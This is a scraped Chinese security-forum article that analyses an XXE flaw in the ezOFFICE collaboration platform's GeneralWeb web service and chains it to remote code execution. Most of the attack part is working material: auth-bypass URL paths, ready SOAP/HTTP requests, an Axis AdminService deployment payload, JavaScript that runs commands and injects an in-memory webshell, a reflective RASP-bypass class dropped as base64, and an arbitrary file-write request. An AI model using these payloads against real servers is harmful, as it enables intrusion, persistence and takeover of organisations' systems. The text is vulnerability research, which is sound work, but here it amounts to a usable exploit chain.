<style>html #layuicss-skinlayercss{display:none;position:absolute;width:1989px}@-webkit-keyframes bounceIn{0%{opacity:0;-webkit-transform:scale(.5);transform:scale(.5)}100%{opacity:1;-webkit-transform:scale(1);transform:scale(1)}}@keyframes bounceIn{0%{opacity:0;-webkit-transform:scale(.5);-ms-transform:scale(.5);transform:scale(.5)}100%{opacity:1;-webkit-transform:scale(1);-ms-transform:scale(1);transform:scale(1)}}@-webkit-keyframes zoomInDown{0%{opacity:0;-webkit-transform:scale(.1) translateY(-2000px);transform:scale(.1) translateY(-2000px);-webkit-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out}60%{opacity:1;-webkit-transform:scale(.475) translateY(60px);transform:scale(.475) translateY(60px);-webkit-animation-timing-function:ease-out;animation-timing-function:ease-out}}@keyframes zoomInDown{0%{opacity:0;-webkit-transform:scale(.1) translateY(-2000px);-ms-transform:scale(.1) translateY(-2000px);transform:scale(.1) translateY(-2000px);-webkit-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out}60%{opacity:1;-webkit-transform:scale(.475) translateY(60px);-ms-transform:scale(.475) translateY(60px);transform:scale(.475) translateY(60px);-webkit-animation-timing-function:ease-out;animation-timing-function:ease-out}}@-webkit-keyframes fadeInUpBig{0%{opacity:0;-webkit-transform:translateY(2000px);transform:translateY(2000px)}100%{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}}@keyframes fadeInUpBig{0%{opacity:0;-webkit-transform:translateY(2000px);-ms-transform:translateY(2000px);transform:translateY(2000px)}100%{opacity:1;-webkit-transform:translateY(0);-ms-transform:translateY(0);transform:translateY(0)}}@-webkit-keyframes zoomInLeft{0%{opacity:0;-webkit-transform:scale(.1) translateX(-2000px);transform:scale(.1) translateX(-2000px);-webkit-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out}60%{opacity:1;-webkit-transform:scale(.475) translateX(48px);transform:scale(.475) translateX(48px);-webkit-animation-timing-function:ease-out;animation-timing-function:ease-out}}@keyframes zoomInLeft{0%{opacity:0;-webkit-transform:scale(.1) translateX(-2000px);-ms-transform:scale(.1) translateX(-2000px);transform:scale(.1) translateX(-2000px);-webkit-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out}60%{opacity:1;-webkit-transform:scale(.475) translateX(48px);-ms-transform:scale(.475) translateX(48px);transform:scale(.475) translateX(48px);-webkit-animation-timing-function:ease-out;animation-timing-function:ease-out}}@-webkit-keyframes rollIn{0%{opacity:0;-webkit-transform:translateX(-100%) rotate(-120deg);transform:translateX(-100%) rotate(-120deg)}100%{opacity:1;-webkit-transform:translateX(0) rotate(0);transform:translateX(0) rotate(0)}}@keyframes rollIn{0%{opacity:0;-webkit-transform:translateX(-100%) rotate(-120deg);-ms-transform:translateX(-100%) rotate(-120deg);transform:translateX(-100%) rotate(-120deg)}100%{opacity:1;-webkit-transform:translateX(0) rotate(0);-ms-transform:translateX(0) rotate(0);transform:translateX(0) rotate(0)}}@keyframes fadeIn{0%{opacity:0}100%{opacity:1}}@-webkit-keyframes shake{0%,100%{-webkit-transform:translateX(0);transform:translateX(0)}10%,30%,50%,70%,90%{-webkit-transform:translateX(-10px);transform:translateX(-10px)}20%,40%,60%,80%{-webkit-transform:translateX(10px);transform:translateX(10px)}}@keyframes shake{0%,100%{-webkit-transform:translateX(0);-ms-transform:translateX(0);transform:translateX(0)}10%,30%,50%,70%,90%{-webkit-transform:translateX(-10px);-ms-transform:translateX(-10px);transform:translateX(-10px)}20%,40%,60%,80%{-webkit-transform:translateX(10px);-ms-transform:translateX(10px);transform:translateX(10px)}}@-webkit-keyframes fadeIn{0%{opacity:0}100%{opacity:1}}@-webkit-keyframes bounceOut{100%{opacity:0;-webkit-transform:scale(.7);transform:scale(.7)}30%{-webkit-transform:scale(1.05);transform:scale(1.05)}0%{-webkit-transform:scale(1);transform:scale(1)}}@keyframes bounceOut{100%{opacity:0;-webkit-transform:scale(.7);-ms-transform:scale(.7);transform:scale(.
<body>
<div class="global-nav mb-50">
<nav class="navbar navbar-inverse navbar-fixed-top">
<div class="container nav">
<div class="visible-xs header-response sf-hidden">
</div>
<div class="row hidden-xs">
<div class="col-sm-9 col-md-9 col-lg-9">
<div class=navbar-header>
<button type=button class="navbar-toggle collapsed sf-hidden" data-toggle=collapse data-target=#global-navbar>
</button>
<div class=logo><a class="navbar-brand logo" href=https://forum.butian.net/></a></div>
</div>
<div class="collapse navbar-collapse" id=global-navbar>
<ul class="nav navbar-nav">
<li><a href=https://forum.butian.net/>首页 <span class=sr-only>(current)</span></a></li>
<li><a href=https://forum.butian.net/questions>问答</a></li>
<li><a href=https://forum.butian.net/shop>商城</a></li>
<li><a href=https://forum.butian.net/community>实战攻防技术</a></li>
<li><a href=https://forum.butian.net/articles>漏洞分析与复现</a>
<span class=hot>NEW</span>
</li>
<li><a href=https://forum.butian.net/movable>活动</a></li>
<li><a href=https://forum.butian.net/questions/Play>摸鱼办</a>
</li>
</ul>
<form role=search id=top-search-form action=https://forum.butian.net/search method=GET class="navbar-form hidden-sm hidden-xs pull-right">
<span class="btn btn-link"><span class=sr-only>搜索</span><span class="glyphicon glyphicon-search"></span></span>
<input type=text name=word id=searchBox class=form-control placeholder value>
</form>
</div>
</div>
</div>
</div>
</nav>
</div>
<div class="top-alert mt-60 clearfix text-center">
<!--[if lt IE 9]>
<div class="alert alert-danger topframe" role="alert">你的浏览器实在<strong>太太太太太太旧了</strong>,放学别走,升级完浏览器再说
<a target="_blank" class="alert-link" href="http://browsehappy.com">立即升级</a>
</div>
<![endif]-->
</div>
<div class=wrap>
<div class=container>
<div class="row mt-10">
<div class="col-xs-12 col-md-9 main" style=width:100%>
<div class=widget-article>
<h3 class="title word-wrap">万户ezOFFICE协同管理平台 GeneralWeb XXE to RCE</h3>
<ul class=taglist-inline>
<li class=tagPopup><a class=tag href=https://forum.butian.net/topic/48>漏洞分析</a></li>
<li class=tagPopup><a class=tag href=https://forum.butian.net/topic/47>渗透测试</a></li>
</ul>
<div class="content mt-10">
<div class="quote mb-20">
之前实战遇到了但是网上的poc懂得都懂索性就专门研究一下漏洞成因利用以及内存马方面
</div>
<textarea id=md_view_content style=display:none value="![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-679b14fb254b2fb83cbe48b2e963318e78236e95.png)
之前实战遇到了但是网上的poc懂得都懂索性就专门研究一下
JDK版本1.6.0
操作系统Windows Server 2012
漏洞分析
----
从web.xml看起
![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-4bbb04580b8ae906e93dab8eefa4cc44dd21a238.png)
使用了 XFire 与 Axis 两种 WebService 框架
看到 XFire 配置文件`D:/jboss/jboss-as/server/oa/deploy/defaultroot.war/WEB-INF/classes/META-INF/xfire/services.xml`
![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-d33e85de27468a143fce1fdf4de45d91fb21d709.png)
配置了一个GeneralWeb的服务找到该类`com.whir.service.webservice.GeneralWeb`
```java
package com.whir.service.webservice;
import com.whir.service.common.CallApi;
public class GeneralWeb {
public String OAManager(String input) throws Exception {
CallApi callapi = new CallApi();
return callapi.getResult(input);
}
}
```
`com.whir.service.common.CallApi#getResult`
```java
public String getResult(String input) throws Exception {
if (serviceMap == null) {
throw new Exception(&quot;Error: serviceMap can not is null&quot;);
}
SAXBuilder builder = new SAXBuilder();
byte[] b = input.getBytes(&quot;utf-8&quot;);
InputStream is = new ByteArrayInputStream(b);
Document doc = builder.build(is);
Element root = doc.getRootElement();
```
使用SAXBuilder进行解析并且未进行过滤产生XXE漏洞
鉴权方面代码在`com.whir.common.util.SetCharacterEncodingFilter`
![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-889c69a7c94a8f970c2f358344bf3ac33530d91d.png)
使用的是 getRequestURI那么就有很多绕过方法了简单列举几个
```php
/iWebOfficeSign/OfficeServer.jsp/../../
/xfservices/./GeneralWeb
.jsp;.js
```
漏洞利用
----
触发dnslog
```php
POST /defaultroot/xfservices/./GeneralWeb HTTP/1.1
Host:
User-Agent: Moziilla/5.0 (Linux; U; Android 2.3.6; en-us; Nexus S Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1
Content-Type: text/xml;charset=UTF-8
SOAPAction:
Content-Length: 457
<soapenv:Envelope xmlns:soapenv=&quot;http://schemas.xmlsoap.org/soap/envelope/&quot; xmlns:gen=&quot;http://com.whir.service/GeneralWeb&quot;>
<soapenv:Body>
<gen:OAManager>
<gen:input>
&amp;lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&amp;gt;
&amp;lt;!DOCTYPE root [
&amp;lt;!ENTITY x SYSTEM &quot;http://123.6x9ryk.dnslog.cn&quot;&amp;gt;]&amp;gt;
&amp;lt;root&amp;gt;&amp;amp;x;&amp;lt;/root&amp;gt;
</gen:input>
</gen:OAManager>
</soapenv:Body>
</soapenv:Envelope>
```
因为使用了Axis我们可以通过AdminServlet创建任意服务看到server-config.wsdd
```xml
<service name=&quot;AdminService&quot; provider=&quot;java:MSG&quot;>
<parameter name=&quot;allowedMethods&quot; value=&quot;AdminService&quot;/>
<parameter name=&quot;enableRemoteAdmin&quot; value=&quot;false&quot;/>
<parameter name=&quot;className&quot; value=&quot;org.apache.axis.utils.Admin&quot;/>
<namespace>http://xml.apache.org/axis/wsdd/</namespace>
</service>
```
那么思路就很清晰了通过xxe的get请求部署恶意服务由于JDK是低版本那么可以部署RhinoScriptEngineService
```xml
http://127.0.0.1:{{Port}}/defaultroot/services/./AdminService?method=!--%3E%3Cdeployment%20xmlns%3D%22http%3A%2F%2Fxml.apache.org%2Faxis%2Fwsdd%2F%22%20xmlns%3Ajava%3D%22http%3A%2F%2Fxml.apache.org%2Faxis%2Fwsdd%2Fproviders%2Fjava%22%3E%3Cservice%20name%3D%22RhinoScriptEngineService%22%20provider%3D%22java%3ARPC%22%3E%3Cparameter%20name%3D%22className%22%20value%3D%22com.sun.script.javascript.RhinoScriptEngine%22%20%2F%3E%3Cparameter%20name%3D%22allowedMethods%22%20value%3D%22eval%22%20%2F%3E%3CtypeMapping%20deserializer%3D%22org.apache.axis.encoding.ser.BeanDeserializerFactory%22%20type%3D%22java%3Ajavax.script.SimpleScriptContext%22%20qname%3D%22ns%3ASimpleScriptContext%22%20serializer%3D%22org.apache.axis.encoding.ser.BeanSerializerFactory%22%20xmlns%3Ans%3D%22urn%3Abeanservice%22%20regenerateElement%3D%22false%22%3E%3C%2FtypeMapping%3E%3C%2Fservice%3E%3C%2Fdeployment
```
![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-933bab13bb758e5a40d3c7a1bdcffcb882bba84b.png)
部署成功
```php
POST /defaultroot/services/./RhinoScriptEngineService HTTP/1.1
Host:
User-Agent: Moziilla/5.0 (Linux; U; Android 2.3.6; en-us; Nexus S Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1
Content-Type: text/xml;charset=UTF-8
SOAPAction:
Content-Length: 973
<soapenv:Envelope xmlns:xsi=&quot;http://www.w3.org/2001/XMLSchema-instance&quot; xmlns:xsd=&quot;http://www.w3.org/2001/XMLSchema&quot; xmlns:soapenv=&quot;http://schemas.xmlsoap.org/soap/envelope/&quot; xmlns:jav=&quot;http://javascript.script.sun.com&quot;>
<soapenv:Body>
<eval xmlns=&quot;http://127.0.0.1:8080/services/scriptEngine&quot;>
<arg0 xmlns=&quot;&quot;>
<![CDATA[
try {
load(&quot;nashorn:Moziilla_compat.js&quot;);
} catch (e) {
}
importPackage(Packages.java.io);
importPackage(Packages.java.lang);
importPackage(Packages.java.util);
var command = &quot;cmd /c whoami&quot;;
var pb = new java.lang.ProcessBuilder(Arrays.asList(command.split(&quot; &quot;)));
var process = pb.start();
var ret = new java.util.Scanner(process.getInputStream()).useDelimiter('\\A').next();
ret;
]]>
</arg0>
<arg1 xmlns=&quot;&quot; xsi:type=&quot;urn:SimpleScriptContext&quot; xmlns:urn=&quot;urn:beanservice&quot;>
</arg1>
</eval>
</soapenv:Body>
</soapenv:Envelope>
```
![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-30d99a7f51736e83f9db2a190628914f5a45c840.png)
成功执行命令
### 内存马
Java-Js-Engine-Payloads<https://github.com/yzddmr6/Java-Js-Engine-Payloads>
适配了JDK6-14的内存马
```java
try {
load(&quot;nashorn:mozilla_compat.js&quot;);
} catch (e) {
}
function getUnsafe() {
var theUnsafeMethod =
java.lang.Class.forName(&quot;sun.misc.Unsafe&quot;).getDeclaredField(&quot;theUnsafe&quot;);
theUnsafeMethod.setAccessible(true);
return theUnsafeMethod.get(null);
}
function removeClassCache(clazz) {
var unsafe = getUnsafe();
var clazzAnonymousClass = unsafe.defineAnonymousClass(
clazz,
java.lang.Class.forName(&quot;java.lang.Class&quot;)
.getResourceAsStream(&quot;Class.class&quot;)
.readAllBytes(),
null
);
var reflectionDataField =
clazzAnonymousClass.getDeclaredField(&quot;reflectionData&quot;);
unsafe.putObject(clazz, unsafe.objectFieldOffset(reflectionDataField), null);
}
function bypassReflectionFilter() {
var reflectionClass;
try {
reflectionClass = java.lang.Class.forName(
&quot;jdk.internal.reflect.Reflection&quot;
);
} catch (error) {
reflectionClass = java.lang.Class.forName(&quot;sun.reflect.Reflection&quot;);
}
var unsafe = getUnsafe();
var classBuffer = reflectionClass
.getResourceAsStream(&quot;Reflection.class&quot;)
.readAllBytes();
var reflectionAnonymousClass = unsafe.defineAnonymousClass(
reflectionClass,
classBuffer,
null
);
var fieldFilterMapField =
reflectionAnonymousClass.getDeclaredField(&quot;fieldFilterMap&quot;);
var methodFilterMapField =
reflectionAnonymousClass.getDeclaredField(&quot;methodFilterMap&quot;);
if (
fieldFilterMapField
.getType()
.isAssignableFrom(java.lang.Class.forName(&quot;java.util.HashMap&quot;))
) {
unsafe.putObject(
reflectionClass,
unsafe.staticFieldOffset(fieldFilterMapField),
java.lang.Class.forName(&quot;java.util.HashMap&quot;)
.getConstructor()
.newInstance()
);
}
if (
methodFilterMapField
.getType()
.isAssignableFrom(java.lang.Class.forName(&quot;java.util.HashMap&quot;))
) {
unsafe.putObject(
reflectionClass,
unsafe.staticFieldOffset(methodFilterMapField),
java.lang.Class.forName(&quot;java.util.HashMap&quot;)
.getConstructor()
.newInstance()
);
}
removeClassCache(java.lang.Class.forName(&quot;java.lang.Class&quot;));
}
function setAccessible(accessibleObject) {
var unsafe = getUnsafe();
var overrideField = java.lang.Class.forName(
&quot;java.lang.reflect.AccessibleObject&quot;
).getDeclaredField(&quot;override&quot;);
var offset = unsafe.objectFieldOffset(overrideField);
unsafe.putBoolean(accessibleObject, offset, true);
}
function defineClass(bytes) {
var clz = null;
var version = java.lang.System.getProperty(&quot;java.version&quot;);
var unsafe = getUnsafe();
var classLoader = new java.net.URLClassLoader(
java.lang.reflect.Array.newInstance(
java.lang.Class.forName(&quot;java.net.URL&quot;),
0
)
);
try {
if (version.split(&quot;.&quot;)[0] &amp;gt;= 11) {
bypassReflectionFilter();
defineClassMethod = java.lang.Class.forName(
&quot;java.lang.ClassLoader&quot;
).getDeclaredMethod(
&quot;defineClass&quot;,
java.lang.Class.forName(&quot;[B&quot;),
java.lang.Integer.TYPE,
java.lang.Integer.TYPE
);
setAccessible(defineClassMethod);
clz = defineClassMethod.invoke(classLoader, bytes, 0, bytes.length);
} else {
var protectionDomain = new java.security.ProtectionDomain(
new java.security.CodeSource(
null,
java.lang.reflect.Array.newInstance(
java.lang.Class.forName(&quot;java.security.cert.Certificate&quot;),
0
)
),
null,
classLoader,
[]
);
clz = unsafe.defineClass(
null,
bytes,
0,
bytes.length,
classLoader,
protectionDomain
);
}
} catch (error) {
error.printStackTrace();
} finally {
return clz;
}
}
function base64DecodeToByte(str) {
var bt;
try {
bt = java.lang.Class.forName(&quot;sun.misc.BASE64Decoder&quot;).newInstance().decodeBuffer(str);
} catch (e) {
bt = java.lang.Class.forName(&quot;java.util.Base64&quot;).newInstance().getDecoder().decode(str);
}
return bt;
}
clz = defineClass(base64DecodeToByte(code));
clz.newInstance();
```
由于JBoss 低版本套的是 tomcat所以直接使用 tomcat 内存马即可
![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-87ab87fce34e7e41b93767a4a479fcbcd37b3f8a.png)
使用Listener组件容错高
![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-c1ea2c55639e04a5643b94defd04fd15cadbae59.png)
执行,无报错并且返回 200说明成功了
![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-24153a68c8d45034111bcc9bd3656df5280b0148.png)
随便找个路径连接即可
### RASP绕过
在命令执行的时候可能会遇到:**java.lang.SecurityException: cmd execute denied !!!**
![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-4c237161525299a4b84664bcfc5e228953a77419.png)
即存在RASP而RASP一般是通过黑名单进行过滤的
这里禁用了ProcessBuilder我们尝试更底层的命令执行ProcessImpl该类是private所以只能反射调用
![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-350f2ffdee079101528ae6f4106f34e2e2e5792b.png)
这里JDK1.6和JDK1.8的构造方法存在差异,所以需要小小修改一下
当调用setAccessible的时候会报错
```php
sun.org.mozilla.javascript.internal.EcmaError: TypeError: Cannot call method &quot;setAccessible&quot; of null
```
![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-72f5ac149880b8a2ce93a7b044c47067ab32102c.png)
在js中无法反射调用根据网上的文章我们可以写class文件然后URLClassLoader去加载
```java
import java.io.ByteArrayOutputStream;
import java.io.InputStream;
import java.lang.reflect.Method;
import java.util.Map;
public class Testcmd {
String result = &quot;&quot;;
public Testcmd(String paramString) throws Exception{
boolean isLinux = true;
String osTyp = System.getProperty(&quot;os.name&quot;);
if (osTyp != null &amp;amp;&amp;amp; osTyp.toLowerCase().contains(&quot;win&quot;)) {
isLinux = false;
}
String[] cmds = isLinux ? new String[]{&quot;bash&quot;, &quot;-c&quot;, paramString} : new String[]{&quot;cmd.exe&quot;, &quot;/c&quot;, paramString};
Class clazz = Class.forName(&quot;java.lang.ProcessImpl&quot;);
Method method = clazz.getDeclaredMethod(&quot;start&quot;, String[].class, Map.class,String.class,boolean.class);
method.setAccessible(true);
InputStream ins = ((Process) method.invoke(null,cmds,null,null,true)).getInputStream();
ByteArrayOutputStream bos = new ByteArrayOutputStream();
byte[] bytes = new byte[1024];
int size;
while((size = ins.read(bytes)) &amp;gt; 0)
bos.write(bytes,0,size);
ins.close();
this.result = bos.toString();
}
public java.lang.String toString() {
return this.result;
}
public static void main(String[] args) {
}
}
```
没有ban掉File类可以将class文件写入到系统中
```java
try {
load(&quot;nashorn:Moziilla_compat.js&quot;);
} catch (e) {
}
importPackage(Packages.java.io);
importPackage(Packages.java.lang);
importPackage(Packages.sun.misc);
var file = new File(&quot;../server/Testcmd.class&quot;);
var fos = new FileOutputStream(file);
var base64Decoder = new BASE64Decoder();
var decodeContent = base64Decoder.decodeBuffer(&quot;yv66vgAAADIAkAoAFwBPCABQCQAiAFEIAFIKAFMAVAoACQBVCABWCgAJAFcHAFgIAFkIAFoIAFsIAFwIAF0KABEAXggAXwcAYAcAMQcAYQkAYgBjCgARAGQKAGUAZgcAZwoAYgBoCgBlAGkHAGoKABoAawcAbAoAHABPCgBtAG4KABwAbwoAbQBwCgAcAHEHAHIBAAZyZXN1bHQBABJMamF2YS9sYW5nL1N0cmluZzsBAAY8aW5pdD4BABUoTGphdmEvbGFuZy9TdHJpbmc7KVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEACUxUZXN0Y21kOwEAC3BhcmFtU3RyaW5nAQAHaXNMaW51eAEAAVoBAAVvc1R5cAEABGNtZHMBABNbTGphdmEvbGFuZy9TdHJpbmc7AQAFY2xhenoBABFMamF2YS9sYW5nL0NsYXNzOwEABm1ldGhvZAEAGkxqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2Q7AQADaW5zAQAVTGphdmEvaW8vSW5wdXRTdHJlYW07AQADYm9zAQAfTGphdmEvaW8vQnl0ZUFycmF5T3V0cHV0U3RyZWFtOwEABWJ5dGVzAQACW0IBAARzaXplAQABSQEADVN0YWNrTWFwVGFibGUHAHIHAFgHAGAHAHMHAHQHAGwHADsBAApFeGNlcHRpb25zBwB1AQAIdG9TdHJpbmcBABQoKUxqYXZhL2xhbmcvU3RyaW5nOwEABG1haW4BABYoW0xqYXZhL2xhbmcvU3RyaW5nOylWAQAEYXJncwEAClNvdXJjZUZpbGUBACFUZXN0Y21kLmphdmEgZnJvbSBJbnB1dEZpbGVPYmplY3QMACUAdgEAAAwAIwAkAQAHb3MubmFtZQcAdwwAeAB5DAB6AEkBAAN3aW4MAHsAfAEAEGphdmEvbGFuZy9TdHJpbmcBAARiYXNoAQACLWMBAAdjbWQuZXhlAQACL2MBABVqYXZhLmxhbmcuUHJvY2Vzc0ltcGwMAH0AfgEABXN0YXJ0AQAPamF2YS9sYW5nL0NsYXNzAQANamF2YS91dGlsL01hcAcAfwwAgAAzDACBAIIHAHMMAIMAhAEAEGphdmEvbGFuZy9PYmplY3QMAIUAhgwAhwCIAQARamF2YS9sYW5nL1Byb2Nlc3MMAIkAigEAHWphdmEvaW8vQnl0ZUFycmF5T3V0cHV0U3RyZWFtBwB0DACLAIwMAI0AjgwAjwB2DABIAEkBAAdUZXN0Y21kAQAYamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kAQATamF2YS9pby9JbnB1dFN0cmVhbQEAE2phdmEvbGFuZy9FeGNlcHRpb24BAAMoKVYBABBqYXZhL2xhbmcvU3lzdGVtAQALZ2V0UHJvcGVydHkBACYoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nOwEAC3RvTG93ZXJDYXNlAQAIY29udGFpbnMBABsoTGphdmEvbGFuZy9DaGFyU2VxdWVuY2U7KVoBAAdmb3JOYW1lAQAlKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL0NsYXNzOwEAEWphdmEvbGFuZy9Cb29sZWFuAQAEVFlQRQEAEWdldERlY2xhcmVkTWV0aG9kAQBAKExqYXZhL2xhbmcvU3RyaW5nO1tMamF2YS9sYW5nL0NsYXNzOylMamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kOwEADXNldEFjY2Vzc2libGUBAAQoWilWAQAHdmFsdWVPZgEAFihaKUxqYXZhL2xhbmcvQm9vbGVhbjsBAAZpbnZva2UBADkoTGphdmEvbGFuZy9PYmplY3Q7W0xqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAEcmVhZAEABShbQilJAQAFd3JpdGUBAAcoW0JJSSlWAQAFY2xvc2UAIQAiABcAAAABAAAAIwAkAAAAAwABACUAJgACACcAAAH5AAYACwAAAOIqtwABKhICtQADBD0SBLgABU4txgARLbYABhIHtgAImQAFAz0cmQAYBr0ACVkDEgpTWQQSC1NZBStTpwAVBr0ACVkDEgxTWQQSDVNZBStTOgQSDrgADzoFGQUSEAe9ABFZAxMAElNZBBMAE1NZBRMACVNZBrIAFFO2ABU6BhkGBLYAFhkGAQe9ABdZAxkEU1kEAVNZBQFTWQYEuAAYU7YAGcAAGrYAGzoHuwAcWbcAHToIEQQAvAg6CRkHGQm2AB5ZNgqeABAZCBkJAxUKtgAfp//pGQe2ACAqGQi2ACG1AAOxAAAAAwAoAAAASgASAAAACAAEAAcACgAJAAwACgASAAsAIgAMACQADgBRABAAWAARAH0AEgCDABMAqQAUALIAFQC5ABcAxgAYANMAGgDYABsA4QAcACkAAABwAAsAAADiACoAKwAAAAAA4gAsACQAAQAMANYALQAuAAIAEgDQAC8AJAADAFEAkQAwADEABABYAIoAMgAzAAUAfQBlADQANQAGAKkAOQA2ADcABwCyADAAOAA5AAgAuQApADoAOwAJAMMAHwA8AD0ACgA+AAAAPwAF/wAkAAQHAD8HAEABBwBAAAAYUQcAEv8AaQAKBwA/BwBAAQcAQAcAEgcAQQcAQgcAQwcARAcARQAA/AAZAQBGAAAABAABAEcAAQBIAEkAAQAnAAAALwABAAEAAAAFKrQAA7AAAAACACgAAAAGAAEAAAAeACkAAAAMAAEAAAAFACoAKwAAAAkASgBLAAEAJwAAACsAAAABAAAAAbEAAAACACgAAAAGAAEAAAAiACkAAAAMAAEAAAABAEwAMQAAAAEATQAAAAIATg==&quot;);
fos.write(decodeContent, new Integer(0), new Integer(decodeContent.length));
fos.close();
```
最后就是网上公开的poc了
![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-f4332d108c30507b1bfcbddd2005290a822b0cbf.png)
### StringUtil任意文件写
网上还存在一种方法:使用`com.whir.ezoffice.ezform.util.StringUtil`这个类写文件
![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-fc12c86d40e331cd3ebfb1b6fca156c6ce9e0d9b.png)
存在无参构造方法满足service条件
```java
private static void writeToFile(String fileName, String content) throws IOException {
BufferedOutputStream outStream = null;
OutputStreamWriter writer = null;
try {
String dirPath = &quot;&quot;;
if (fileName.lastIndexOf(&quot;/&quot;) != -1) {
dirPath = fileName.substring(0, fileName.lastIndexOf(&quot;/&quot;));
}
File dir = new File(dirPath);
if (!dir.exists() &amp;amp;&amp;amp; !dir.mkdirs()) {
throw new IOException(&quot;create directory '&quot; + dirPath + &quot;' failed!&quot;);
}
outStream = new BufferedOutputStream(new FileOutputStream(fileName, true));
writer = new OutputStreamWriter(outStream);
writer.write(content);
} catch (IOException var9) {
throw var9;
} finally {
if (writer != null) {
writer.close();
}
if (outStream != null) {
outStream.close();
}
}
}
public static void printToFile(String fileName, String content) throws IOException {
writeToFile(fileName, content);
}
public static void printlnToFile(String fileName, String content) throws IOException {
writeToFile(fileName, content + &quot;\n&quot;);
}
```
可以通过 printToFile 方法任意文件写,内容以及文件名均可控
```php
http://127.0.0.1:{{port}}/defaultroot/services/./AdminService?method=!--%3E%3Cdeployment%20xmlns=%22http://xml.apache.org/axis/wsdd/%22%20xmlns:java=%22http://xml.apache.org/axis/wsdd/providers/java%22%3E%3Cservice%20name=%22freemarkerQa%22%20provider=%22java:RPC%22%3E%3Cparameter%20name=%22className%22%20value=%22com.whir.ezoffice.ezform.util.StringUtil%22/%3E%3Cparameter%20name=%22allowedMethods%22%20value=%22*%22/%3E%3C/service%3E%3C/deployment
```
网上众多的 freemarkerQa 服务均是调用的该类
```php
POST /defaultroot/./services/freemarkerQa HTTP/1.1
Host:
User-Agent: Moziilla/5.0 (Linux; U; Android 2.3.6; en-us; Nexus S Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1
SOAPAction:
Content-Type: text/xml;charset=UTF-8
Content-Length: 606
<soapenv:Envelope xmlns:xsi=&quot;http://www.w3.org/2001/XMLSchema-instance&quot; xmlns:xsd=&quot;http://www.w3.org/2001/XMLSchema&quot; xmlns:soapenv=&quot;http://schemas.xmlsoap.org/soap/envelope/&quot; xmlns:util=&quot;http://util.ezform.ezoffice.whir.com&quot;>
<soapenv:Body>
<util:printToFile soapenv:encodingStyle=&quot;http://schemas.xmlsoap.org/soap/encoding/&quot;>
<fileName xsi:type=&quot;soapenc:string&quot; xmlns:soapenc=&quot;http://schemas.xmlsoap.org/soap/encoding/&quot;>../server/oa/deploy/defaultroot.war/1.txt</fileName>
<content xsi:type=&quot;soapenc:string&quot;>x</content>
</util:printToFile>
</soapenv:Body>
</soapenv:Envelope>
```
![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-2f970068174235f1ffd981ed0d0d245886092c89.png)
验证成功
总结
--
实战中很有意思的一个漏洞但网上的poc。。。呃呃
还可以尝试打freemarker、bsh
万户作为老牌oa还是很值得去学习研究的
参考:
[万户rce](https://mp.weixin.qq.com/s/sktnBnCrZUoqkhGM0O9HRQ)
[实战 | 万户GeneralWeb组合Bypass Rasp](https://mp.weixin.qq.com/s/4FyX_zmY90yGLzdJgUGzcg)">![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-679b14fb254b2fb83cbe48b2e963318e78236e95.png)
之前实战遇到了但是网上的poc懂得都懂索性就专门研究一下
JDK版本1.6.0
操作系统Windows Server 2012
漏洞分析
----
从web.xml看起
![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-4bbb04580b8ae906e93dab8eefa4cc44dd21a238.png)
使用了 XFire 与 Axis 两种 WebService 框架
看到 XFire 配置文件`D:/jboss/jboss-as/server/oa/deploy/defaultroot.war/WEB-INF/classes/META-INF/xfire/services.xml`
![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-d33e85de27468a143fce1fdf4de45d91fb21d709.png)
配置了一个GeneralWeb的服务找到该类`com.whir.service.webservice.GeneralWeb`
```java
package com.whir.service.webservice;
import com.whir.service.common.CallApi;
public class GeneralWeb {
public String OAManager(String input) throws Exception {
CallApi callapi = new CallApi();
return callapi.getResult(input);
}
}
```
`com.whir.service.common.CallApi#getResult`
```java
public String getResult(String input) throws Exception {
if (serviceMap == null) {
throw new Exception("Error: serviceMap can not is null");
}
SAXBuilder builder = new SAXBuilder();
byte[] b = input.getBytes("utf-8");
InputStream is = new ByteArrayInputStream(b);
Document doc = builder.build(is);
Element root = doc.getRootElement();
```
使用SAXBuilder进行解析并且未进行过滤产生XXE漏洞
鉴权方面代码在`com.whir.common.util.SetCharacterEncodingFilter`
![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-889c69a7c94a8f970c2f358344bf3ac33530d91d.png)
